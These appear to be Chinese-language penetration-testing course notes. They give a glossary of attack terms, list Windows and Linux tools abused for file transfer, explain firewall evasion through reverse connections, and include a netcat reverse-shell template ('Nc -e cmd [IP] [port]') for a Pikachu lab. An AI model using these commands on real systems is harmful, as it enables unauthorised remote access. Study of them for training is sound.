一、名词解析:
POC:”Proof of Concept” 概念代码常指一段漏洞证明的代码
Exp:直接利用的漏洞,可以有攻击动作
前后端:前端通常指与用户可视,交互信息的一端,后端常为处理信息,做出响应的一端
Payload:有效载荷,指在漏洞利用后,真正在目标系统执行的代码或指令
Shellcode:payload的一种,常有正向、反向。
后门/Webshell:给进入系统的方式增加一道门,通常由攻击者上传,方便下次再进入,也有开发人员预留后面,方便日后维护。
木马/病毒:表面上正常但是运行时对系统造成损害的,例如控制系统权限、修改系统文件等。
反弹:防火墙对入站流量检测非常严格,但是对出站流量非常宽松,用受害机主动连接攻击机,让控制流量即变为出站流量。
回显:在客户端做出一些列动作后,服务器回显回来的消息,常见的如200,404,也有一些有用的错误信息。
跳板:一个具有辅助功能的机器,利用这台主机作为间接工具,攻击其他机器,与肉鸡连用
黑盒白盒测试:黑盒指无法看到源代码,在黑暗中进行测试,不断用工具猜测出大致代码;白盒指代码可见,在能看见代码情况下根据一些常见薄弱点、敏感函数进行测试。
暴力破解:排列组合,逐一尝试
社会工程学:利用人性的一些弱点。
撞库:利用收集的其他地方的用户信息和密码信息,生成对应的字典表,对该用户其他内容进行登陆尝试。
ATT&CK:MITRE ATT&CK®
案例实操
#基础案例 1:操作系统-用途&命令&权限&用户&防火墙
1、个人计算机&服务器用机
Win10、win7、winxp&win2008 win2012
2、Windows&Linux 常见命令
文件权限&服务权限&用户权限等
系统用户&用户组&服务用户等分类
自带防火墙出站&入站规则策略协议
WAF:Web Application Firewall(针对于网站的防火墙,类似于安全狗,阿里云盾)
#实用案例 1:文件上传下载-解决无图形化&解决数据传输
Linux:wget 、curl 、python 、ruby 、perl 、java 等
Windows:PowerShell 、Certutil 、Bitsadmin 、msiexec 、mshta 、rundll32 等
#实用案例 2:反弹 Shell 命令-解决数据回显&解决数据通讯
useradd 用户名 passwd 用户名
测试 Linux 系统添加用户或修改密码命令交互回显问题
Nc用法
Nc -e cmd [IP] [port] 反弹cmd窗口权限
#结合案例 1:防火墙绕过-正向连接&反向连接&内网服务器
1、内网: 内网 -> xiaodi8
xiaodi8 !-> 内网
2、防火墙: xiaodi8 <-> aliyun xiaodi8 (在没有防火墙时)
有防火墙后:
防火墙 -> aliyun
aliyun !-> xiaodi8 防火墙
防火墙入站检测严格,出站检测宽松
正向连接和反向连接:基于某个参照,例如本机为攻击机(参照物),受害机主动连接即为反向连接,但是对于受害机主动发出即为主动连接
Pikachu
上传nc文件,叫exploit